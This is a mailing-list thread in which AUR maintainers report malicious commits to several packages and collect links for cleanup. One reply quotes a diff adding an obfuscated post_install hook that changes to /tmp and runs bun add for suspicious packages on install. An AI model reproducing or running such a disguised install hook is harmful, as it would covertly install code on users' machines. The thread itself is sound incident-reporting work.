Those too -- but I can't see the malicious commits on HEAD so I assume somebody took action already. - https://aur.archlinux.org/cgit/aur.git/commit/?h=gulden-appimage&id=8188e5841b9d50384b7dde9136d80fbd1415c818 - https://aur.archlinux.org/cgit/aur.git/commit/?h=hack-browser-data-git&id=191ddf65e0337ee9df30d7e643fc13f6cea3f30d - https://aur.archlinux.org/cgit/aur.git/commit/?h=kcmlaptop&id=ff8e6c657a41059abbd833196b18e852453385e4
On Sun, 14 Jun 2026 at 11:21, Nicolas Boichat <[email protected]> wrote: > > There's a new wave (detected using my local Gemma E2B model FWIW). > > It's a little bit more elaborate: > https://aur.archlinux.org/cgit/aur.git/commit/?h=htbrowser-bin&id=462c21877fe6d2f563ed6620ef227e06ac8c51c8 > > diff --git a/htbrowser-bin-deps.install b/htbrowser-bin-deps.install > new file mode 100644 > index 000000000000..9806501accad > --- /dev/null > +++ b/htbrowser-bin-deps.install > @@ -0,0 +1,3 @@ > +post_install() { > + $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' > $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' > 'n'"e"'x'"t""f"'i''l''e''-''j''s' > +} > > On Fri, 12 Jun 2026 at 01:47, Jonathan Grotelüschen > <[email protected]> wrote: > > > > Hi everyone, > > > > we’re working hard to reset/delete all malicious commits and ban the > > accounts. > > > > If you find more malicious packages, please **send them as a reply to > > this email** to keep them all in one thread. > > > > Thanks! > > > > -- > > tippfehlr
